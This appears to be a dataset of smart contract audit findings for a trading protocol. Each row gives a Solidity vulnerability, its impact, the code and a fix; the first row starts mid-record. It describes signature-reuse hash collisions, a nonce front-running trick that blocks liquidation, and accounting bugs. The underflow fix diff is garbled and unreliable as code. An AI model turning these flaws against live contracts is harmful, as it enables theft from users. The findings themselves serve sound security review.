1 passed; 0 failed; finished in 11.27ms\\n```\\n\\nFrom the above test example, we can see that the `verifyPrices` and `verifyPartyAUpnlAndPrice` signatures can be used interchangeably. If we get a legal `verifyPartyAUpnlAndPrice` , it can be used as the signature of `verifyPrices()`. Use `partyANonces` as `upnl`, etc","It is recommended to add the prefix of the hash, or use `abi.encode` Such as:\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, ""LibMuon: Invalid length"");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n+ ""verifyPrices"",\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n","Signatures can be reused due to hash collisions, through illegal signatures, using illegal `upnl`, etc","```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, ""LibMuon: Invalid length"");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n" +`depositAndAllocateForPartyB` is broken due to incorrect precision,high,"Due to incorrect precision, any users or external protocols utilizing the `depositAndAllocateForPartyB` to allocate 1000 USDC will end up only having 0.000000001 USDC allocated to their account. 
This might potentially lead to unexpected loss of funds due to the broken functionality if they rely on the accuracy of the function outcome to perform certain actions that deal with funds/assets.\\nThe input `amount` of the `depositForPartyB` function must be in native precision (e.g. USDC should be 6 decimals) as the function will automatically scale the `amount` to 18 precision in Lines 114-115 below.\\n```\\nFile: AccountFacetImpl.sol\\n function depositForPartyB(uint256 amount) internal {\\n IERC20(GlobalAppStorage.layout().collateral).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountStorage.layout().balances[msg.sender] += amountWith18Decimals;\\n }\\n```\\n\\nOn the other hand, the input `amount` of `allocateForPartyB` function must be in 18 decimals precision. Within the protocol, it uses 18 decimals for internal accounting.\\n```\\nFile: AccountFacetImpl.sol\\n function allocateForPartyB(uint256 amount, address partyA, bool increaseNonce) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n require(accountLayout.balances[msg.sender] >= amount, ""PartyBFacet: Insufficient balance"");\\n require(\\n !MAStorage.layout().partyBLiquidationStatus[msg.sender][partyA],\\n ""PartyBFacet: PartyB isn't solvent""\\n );\\n if (increaseNonce) {\\n accountLayout.partyBNonces[msg.sender][partyA] += 1;\\n }\\n accountLayout.balances[msg.sender] -= amount;\\n accountLayout.partyBAllocatedBalances[msg.sender][partyA] += amount;\\n }\\n```\\n\\nThe `depositAndAllocateForPartyB` function allows the users to deposit and allocate to their accounts within a single transaction. Within the function, it calls the `depositForPartyB` function followed by the `allocateForPartyB` function. The function passes the same `amount` into both the `depositForPartyB` and `allocateForPartyB` functions. 
However, the problem is that one accepts `amount` in native precision (e.g. 6 decimals) while the other accepts `amount` in scaled decimals (e.g. 18 decimals).\\nAssume that Alice calls the `depositAndAllocateForPartyB` function and intends to deposit and allocate 1000 USDC. Thus, she set the `amount` of the `depositAndAllocateForPartyB` function to `1000e6` as the precision of USDC is `6`.\\nThe `depositForPartyB` function at Line 78 will work as intended because it will automatically be scaled up to internal accounting precision (18 decimals) within the function, and 1000 USDC will be deposited to her account.\\nThe `allocateForPartyB` at Line 79 will not work as intended. The function expects the `amount` to be in internal accounting precision (18 decimals), but an `amount` in native precision (6 decimals for USDC) is passed in. As a result, only 0.000000001 USDC will be allocated to her account.\\n```\\nFile: AccountFacet.sol\\n function depositAndAllocateForPartyB(\\n uint256 amount,\\n address partyA\\n ) external whenNotPartyBActionsPaused onlyPartyB {\\n AccountFacetImpl.depositForPartyB(amount);\\n AccountFacetImpl.allocateForPartyB(amount, partyA, true);\\n emit DepositForPartyB(msg.sender, amount);\\n emit AllocateForPartyB(msg.sender, partyA, amount);\\n }\\n```\\n","Scale the `amount` to internal accounting precision (18 decimals) before passing it to the `allocateForPartyB` function.\\n```\\nfunction depositAndAllocateForPartyB(\\n uint256 amount,\\n address partyA\\n) external whenNotPartyBActionsPaused onlyPartyB {\\n AccountFacetImpl.depositForPartyB(amount);\\n// Add the line below\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n// Add the line below\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n// Remove the line below\\n AccountFacetImpl.allocateForPartyB(amount, partyA, true);\\n// Add the line below\\n AccountFacetImpl.allocateForPartyB(amountWith18Decimals, partyA, true);\\n emit 
DepositForPartyB(msg.sender, amount);\\n emit AllocateForPartyB(msg.sender, partyA, amount);\\n}\\n```\\n","Any users or external protocols utilizing the `depositAndAllocateForPartyB` to allocate 1000 USDC will end up only having 0.000000001 USDC allocated to their account, which might potentially lead to unexpected loss of funds due to the broken functionality if they rely on the accuracy of the outcome to perform certain actions dealing with funds/assets.\\nFor instance, Bob's account is close to being liquidated. Thus, he might call the `depositAndAllocateForPartyB` function in an attempt to increase its allocated balance and improve its account health level to avoid being liquidated. However, the `depositAndAllocateForPartyB` is not working as expected, and its allocated balance only increased by a very small amount (e.g. 0.000000001 USDC in our example). Bob believed that his account was healthy, but in reality, his account was still in danger as it only increased by 0.000000001 USDC. 
In the next one or two blocks, the price swung, and Bob's account was liquidated.","```\\nFile: AccountFacetImpl.sol\\n function depositForPartyB(uint256 amount) internal {\\n IERC20(GlobalAppStorage.layout().collateral).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountStorage.layout().balances[msg.sender] += amountWith18Decimals;\\n }\\n```\\n" +Accounting error in PartyB's pending locked balance led to loss of funds,high,"Accounting error in the PartyB's pending locked balance during the partial filling of a position could lead to a loss of assets for PartyB.\\n```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n..SNIP..\\n quoteLayout.quoteIdsOf[quote.partyA].push(currentId);\\n..SNIP..\\n } else {\\n accountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n filledLockedValues\\n );\\n }\\n```\\n\\nParameter Description\\n$quote_{current}$ Current quote (Quote ID = 1)\\n$quote_{new}$ Newly created quote (Quote ID = 2) due to partially filling\\n$lockedValue_{total}$ 100 USD. The locked values of $quote_{current}$\\n$lockedValue_{filled}$ 30 USD. $lockedValue_{filled} = lockedValue_{total}\\times\\frac{filledAmount}{quote.quantity}$\\n$lockedValue_{unfilled}$ 70 USD. $lockedValue_{unfilled} = lockedValue_{total}-lockedValue_{filled}$\\n$pendingLockedBalance_{a}$ 100 USD. PartyA's pending locked balance\\n$pendingLockedBalance_{b}$ 100 USD. PartyB's pending locked balance\\n$pendingQuotes_a$ PartyA's pending quotes. $pendingQuotes_a = [quote_{current}]$\\n$pendingQuotes_b$ PartyB's pending quotes. 
$pendingQuotes_b = [quote_{current}]$\\nAssume the following states before the execution of the `openPosition` function:\\n$pendingQuotes_a = [quote_{current}]$\\n$pendingQuotes_b = [quote_{current}]$\\n$pendingLockedBalance_{a} = 100\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nWhen the `openPosition` function is executed, $quote_{current}$ will be removed from $pendingQuotes_a$ and $pendingQuotes_b$ in Line 156.\\nIf the position is partially filled, $quote_{current}$ will be filled, and $quote_{new}$ will be created with the unfilled amount ($lockedValue_{unfilled}$). The $quote_{new}$ is automatically added to PartyA's pending quote list in Line 225.\\nThe states at this point are as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 100\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nLine 238 removes the balance already filled ($lockedValue_{filled}$) from $pendingLockedBalance_{a}$ . The unfilled balance ($lockedValue_{unfilled}$) does not need to be removed from $pendingLockedBalance_{a}$ because it is now the balance of $quote_{new}$ that belong to PartyA. The value in $pendingLockedBalance_a$ is correct.\\nThe states at this point are as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 70\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nIn Line 239, the code removes the balance already filled ($lockedValue_{filled}$) from $pendingLockedBalance_{b}$\\nThe end state is as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 70\\ USD$\\n$pendingLockedBalance_{b} = 70\\ USD$\\nAs shown above, the value of $pendingLockedBalance_{b}$ is incorrect. 
Even though PartyB has no pending quote, 70 USD is still locked in the pending balance.\\nThere are three (3) important points to note:\\n$quote_{current}$ has already been removed from $pendingQuotes_b$ in Line 156\\n$quote_{new}$ is not automatically added to $pendingQuotes_b$. When $quote_{new}$ is created, it is not automatically locked to PartyB.\\n$pendingQuotes_b$ is empty\\nAs such, $lockedValue_{total}$ should be removed from the $pendingLockedBalance_{b}$ instead of only $lockedvalue_{filled}$.",Update the affected function to remove $lockedValue_{total}$ from the $pendingLockedBalance_{b}$ instead of only $lockedvalue_{filled}$.\\n```\\naccountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\naccountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n// Remove the line below\\n filledLockedValues\\n// Add the line below\\n quote.lockedValues\\n);\\n```\\n,"Every time PartyB partially fill a position, their $pendingLockedBalance_b$ will silently increase and become inflated. The pending locked balance plays a key role in the protocol's accounting system. Thus, an error in the accounting breaks many of the computations and invariants of the protocol.\\nFor instance, it is used to compute the available balance of an account in `partyBAvailableForQuote` function. Assuming that the allocated balance remains the same. If the pending locked balance increases silently due to the bug, the available balance returned from the `partyBAvailableForQuote` function will decrease. Eventually, it will ""consume"" all the allocated balance, and there will be no available funds left for PartyB to open new positions or to deallocate+withdraw funds. 
Thus, leading to lost of assets for PartyB.","```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n..SNIP..\\n quoteLayout.quoteIdsOf[quote.partyA].push(currentId);\\n..SNIP..\\n } else {\\n accountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n filledLockedValues\\n );\\n }\\n```\\n" +Liquidation can be blocked by incrementing the nonce,high,"Malicious users could block liquidators from liquidating their accounts, which creates unfairness in the system and lead to a loss of profits to the counterparty.\\nInstance 1 - Blocking liquidation of PartyA\\nA liquidatable PartyA can block liquidators from liquidating its account.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyA(address partyA, SingleUpnlSig memory upnlSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n\\n LibMuon.verifyPartyAUpnl(upnlSig, partyA);\\n int256 availableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnl,\\n partyA\\n );\\n require(availableBalance < 0, ""LiquidationFacet: PartyA is solvent"");\\n maLayout.liquidationStatus[partyA] = true;\\n maLayout.liquidationTimestamp[partyA] = upnlSig.timestamp;\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n }\\n```\\n\\nWithin the `liquidatePartyA` function, it calls the `LibMuon.verifyPartyAUpnl` function.\\n```\\nFile: LibMuon.sol\\n function verifyPartyAUpnl(SingleUpnlSig memory upnlSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n// require(\\n// block.timestamp <= upnlSig.timestamp + muonLayout.upnlValidTime,\\n// ""LibMuon: Expired signature""\\n// );\\n bytes32 hash = keccak256(\\n 
abi.encodePacked(\\n muonLayout.muonAppId,\\n upnlSig.reqId,\\n address(this),\\n partyA,\\n AccountStorage.layout().partyANonces[partyA],\\n upnlSig.upnl,\\n upnlSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, upnlSig.sigs, upnlSig.gatewaySignature);\\n }\\n```\\n\\nThe `verifyPartyAUpnl` function will take the current nonce of PartyA (AccountStorage.layout().partyANonces[partyA]) to build the hash needed for verification.\\nWhen the PartyA becomes liquidatable or near to becoming liquidatable, it could start to monitor the mempool for any transaction that attempts to liquidate their accounts. Whenever a liquidator submits a `liquidatePartyA` transaction to liquidate their accounts, they could front-run it and submit a transaction to increment their nonce. When the liquidator's transaction is executed, the on-chain PartyA's nonce will differ from the nonce in the signature, and the liquidation transaction will revert.\\nFor those chains that do not have a public mempool, they can possibly choose to submit a transaction that increments their nonce in every block as long as it is economically feasible to obtain the same result.\\nGas fees that PartyA spent might be cheap compared to the number of assets they will lose if their account is liquidated. 
Additionally, gas fees are cheap on L2 or side-chain (The protocol intended to support Arbitrum One, Arbitrum Nova, Fantom, Optimism, BNB chain, Polygon, Avalanche as per the contest details).\\nThere are a number of methods for PartyA to increment their nonce, this includes but not limited to the following:\\nAllocate or deallocate dust amount\\nLock and unlock the dummy position\\nCalls `requestToClosePosition` followed by `requestToCancelCloseRequest` immediately\\nInstance 2 - Blocking liquidation of PartyB\\nThe same exploit can be used to block the liquidation of PartyB since the `liquidatePartyB` function also relies on the `LibMuon.verifyPartyBUpnl,` which uses the on-chain nonce of PartyB for signature verification.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n LibMuon.verifyPartyBUpnl(upnlSig, partyB, partyA);\\n```\\n","In most protocols, whether an account is liquidatable is determined on-chain, and this issue will not surface. However, the architecture of Symmetrical protocol relies on off-chain and on-chain components to determine if an account is liquidatable, which can introduce a number of race conditions such as the one mentioned in this report.\\nConsider reviewing the impact of malicious users attempting to increment the nonce in order to block certain actions in the protocols since most functions rely on the fact that the on-chain nonce must be in sync with the signature's nonce and update the architecture/contracts of the protocol accordingly.","PartyA can block their accounts from being liquidated by liquidators. 
Without the ability to liquidate the insolvent PartyA, the unrealized profits of all PartyBs cannot be realized, and thus they will not be able to withdraw the profits.\\nPartyA could also exploit this issue to block their account from being liquidated to:\\nWait for their positions to recover to reduce their losses\\nBuy time to obtain funds from elsewhere to inject into their accounts to bring the account back to a healthy level\\nSince this is a zero-sum game, the above-mentioned create unfairness to PartyB and reduce their profits.\\nThe impact is the same for the blocking of PartyB liquidation.","```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyA(address partyA, SingleUpnlSig memory upnlSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n\\n LibMuon.verifyPartyAUpnl(upnlSig, partyA);\\n int256 availableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnl,\\n partyA\\n );\\n require(availableBalance < 0, ""LiquidationFacet: PartyA is solvent"");\\n maLayout.liquidationStatus[partyA] = true;\\n maLayout.liquidationTimestamp[partyA] = upnlSig.timestamp;\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n }\\n```\\n" +Liquidation of PartyA will fail due to underflow errors,high,"Liquidation of PartyA will fail due to underflow errors. 
As a result, assets will be stuck, and there will be a loss of assets for the counterparty (the creditor) since they cannot receive the liquidated assets.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePositionsPartyA(\\n address partyA,\\n uint256[] memory quoteIds\\n ) internal returns (bool) {\\n..SNIP..\\n (bool hasMadeProfit, uint256 amount) = LibQuote.getValueOfQuoteForPartyA(\\n accountLayout.symbolsPrices[partyA][quote.symbolId].price,\\n LibQuote.quoteOpenAmount(quote),\\n quote\\n );\\n..SNIP..\\n if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NORMAL\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += quote\\n .lockedValues\\n .cva;\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.LATE\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * accountLayout.liquidationDetails[partyA].deficit) /\\n accountLayout.lockedBalances[partyA].cva);\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.OVERDUE\\n ) {\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n amount -\\n ((amount * accountLayout.liquidationDetails[partyA].deficit) /\\n uint256(-accountLayout.liquidationDetails[partyA].totalUnrealizedLoss));\\n }\\n }\\n```\\n\\nAssume that at this point, the allocated balance of PartyB 
(accountLayout.partyBAllocatedBalances[quote.partyB][partyA]) only has 1000 USD.\\nIn Line 152 above, the `getValueOfQuoteForPartyA` function is called to compute the PnL of a position. Assume the position has a huge profit of 3000 USD due to a sudden spike in price. For this particular position, PartyA will profit 3000 USD while PartyB will lose 3000 USD.\\nIn this case, 3000 USD needs to be deducted from PartyB's account. However, when the `accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;` code at Line 170, 182, or 190 gets executed, an underflow error will occur, and the transaction will revert. This is because `partyBAllocatedBalances` is an unsigned integer, and PartyB only has 1000 USD of allocated balance, but the code attempts to deduct 3000 USD.",Consider implementing the following fixes to ensure that the amount to be deducted will never exceed the allocated balance of PartyB to prevent underflow errors from occurring.\\n```\\nif (hasMadeProfit) {\\n// Add the line below\\n amountToDeduct = amount > accountLayout.partyBAllocatedBalances[quote.partyB][partyA] ? accountLayout.partyBAllocatedBalances[quote.partyB][partyA] : amount\\n// Add the line below\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Remove the line below\\n= amountToDeduct\\n// Remove the line below\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Remove the line below\\n= amount;\\n} else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Add the line below\\n= amount;\\n}\\n```\\n,"Liquidation of PartyA will fail. Since liquidation cannot be completed, the assets that are liable to be liquidated cannot be transferred from PartyA (the debtor) to the counterparty (the creditor). 
Assets will be stuck, and there will be a loss of assets for the counterparty (the creditor) since they cannot receive the liquidated assets.","```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePositionsPartyA(\\n address partyA,\\n uint256[] memory quoteIds\\n ) internal returns (bool) {\\n..SNIP..\\n (bool hasMadeProfit, uint256 amount) = LibQuote.getValueOfQuoteForPartyA(\\n accountLayout.symbolsPrices[partyA][quote.symbolId].price,\\n LibQuote.quoteOpenAmount(quote),\\n quote\\n );\\n..SNIP..\\n if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NORMAL\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += quote\\n .lockedValues\\n .cva;\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.LATE\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * accountLayout.liquidationDetails[partyA].deficit) /\\n accountLayout.lockedBalances[partyA].cva);\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.OVERDUE\\n ) {\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n amount -\\n ((amount * accountLayout.liquidationDetails[partyA].deficit) /\\n uint256(-accountLayout.liquidationDetails[partyA].totalUnrealizedLoss));\\n }\\n }\\n```\\n" +Liquidating pending quotes doesn't return trading fee to party A,medium,"When a user is liquidated, the trading fees of the 
pending quotes aren't returned.\\nWhen a pending/locked quote is canceled, the trading fee is sent back to party A, e.g.\\nBut, when a pending quote is liquidated, the trading fee is not used for the liquidation. Instead, the fee collector keeps the funds:\\n```\\n function liquidatePendingPositionsPartyA(address partyA) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n require(\\n MAStorage.layout().liquidationStatus[partyA],\\n ""LiquidationFacet: PartyA is solvent""\\n );\\n for (uint256 index = 0; index < quoteLayout.partyAPendingQuotes[partyA].length; index++) {\\n Quote storage quote = quoteLayout.quotes[\\n quoteLayout.partyAPendingQuotes[partyA][index]\\n ];\\n if (\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING) &&\\n quoteLayout.partyBPendingQuotes[quote.partyB][partyA].length > 0\\n ) {\\n delete quoteLayout.partyBPendingQuotes[quote.partyB][partyA];\\n AccountStorage\\n .layout()\\n .partyBPendingLockedBalances[quote.partyB][partyA].makeZero();\\n }\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n }\\n AccountStorage.layout().pendingLockedBalances[partyA].makeZero();\\n delete quoteLayout.partyAPendingQuotes[partyA];\\n }\\n```\\n\\n```\\n function liquidatePartyB(\\n address partyB,\\n address partyA,\\n SingleUpnlSig memory upnlSig\\n ) internal {\\n // // rest of code\\n uint256[] storage pendingQuotes = quoteLayout.partyAPendingQuotes[partyA];\\n\\n for (uint256 index = 0; index < pendingQuotes.length; ) {\\n Quote storage quote = quoteLayout.quotes[pendingQuotes[index]];\\n if (\\n quote.partyB == partyB &&\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING)\\n ) {\\n accountLayout.pendingLockedBalances[partyA].subQuote(quote);\\n\\n pendingQuotes[index] = pendingQuotes[pendingQuotes.length - 1];\\n pendingQuotes.pop();\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n 
quote.modifyTimestamp = block.timestamp;\\n } else {\\n index++;\\n }\\n }\\n```\\n\\nThese funds should be used to cover the liquidation. Since no trade has been executed, the fee collector shouldn't earn anything.","return the funds to party A. If party A is being liquidated, use the funds to cover the liquidation. Otherwise, party A keeps the funds.","Liquidation doesn't use paid trading fees to cover outstanding balances. Instead, the funds are kept by the fee collector.","```\\n function liquidatePendingPositionsPartyA(address partyA) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n require(\\n MAStorage.layout().liquidationStatus[partyA],\\n ""LiquidationFacet: PartyA is solvent""\\n );\\n for (uint256 index = 0; index < quoteLayout.partyAPendingQuotes[partyA].length; index++) {\\n Quote storage quote = quoteLayout.quotes[\\n quoteLayout.partyAPendingQuotes[partyA][index]\\n ];\\n if (\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING) &&\\n quoteLayout.partyBPendingQuotes[quote.partyB][partyA].length > 0\\n ) {\\n delete quoteLayout.partyBPendingQuotes[quote.partyB][partyA];\\n AccountStorage\\n .layout()\\n .partyBPendingLockedBalances[quote.partyB][partyA].makeZero();\\n }\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n }\\n AccountStorage.layout().pendingLockedBalances[partyA].makeZero();\\n delete quoteLayout.partyAPendingQuotes[partyA];\\n }\\n```\\n" +In case if trading fee will be changed then refund will be done with wrong amount,medium,"In case if trading fee will be changed then refund will be done with wrong amount\\nWhen user creates quote, then he pays trading fees. 
The amount that should be paid is calculated by the `LibQuote.getTradingFee` function.\\n```\\n function getTradingFee(uint256 quoteId) internal view returns (uint256 fee) {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n Symbol storage symbol = SymbolStorage.layout().symbols[quote.symbolId];\\n if (quote.orderType == OrderType.LIMIT) {\\n fee =\\n (LibQuote.quoteOpenAmount(quote) * quote.requestedOpenPrice * symbol.tradingFee) /\\n 1e36;\\n } else {\\n fee = (LibQuote.quoteOpenAmount(quote) * quote.marketPrice * symbol.tradingFee) / 1e36;\\n }\\n }\\n```\\n\\nAs you can see, `symbol.tradingFee` is used to determine the fee amount. This fee can be changed at any time.\\nWhen an order is canceled, the fee should be returned to the user. This function also uses `LibQuote.getTradingFee` to calculate the fee to return.\\nSo if an order was created before a fee change and canceled after it, the refunded amount will not match the fee originally paid.","You can store the fee paid by the user inside the quote struct. 
And when canceled return that amount.,User or protocol losses portion of funds.,```\\n function getTradingFee(uint256 quoteId) internal view returns (uint256 fee) {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n Symbol storage symbol = SymbolStorage.layout().symbols[quote.symbolId];\\n if (quote.orderType == OrderType.LIMIT) {\\n fee =\\n (LibQuote.quoteOpenAmount(quote) * quote.requestedOpenPrice * symbol.tradingFee) /\\n 1e36;\\n } else {\\n fee = (LibQuote.quoteOpenAmount(quote) * quote.marketPrice * symbol.tradingFee) / 1e36;\\n }\\n }\\n```\\n +lockQuote() increaseNonce parameters do not work properly,medium,"in `lockQuote()` will execute `partyBNonces[quote.partyB][quote.partyA] += 1` if increaseNonce == true But this operation is executed before setting `quote.partyB`, resulting in actually setting `partyBNonces[address(0)][quote.partyA] += 1`\\nin `lockQuote()` , when execute `partyBNonces[quote.partyB][quote.partyA] += 1` , `quote.paryB` is address(0)\\n```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n\\nactually setting `partyBNonces[address(0)][quote.partyA] += 1`","```\\n function lockQuote(uint256 
quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n- accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n+ accountLayout.partyBNonces[msg.sender][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n",increaseNonce parameters do not work properly,"```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n 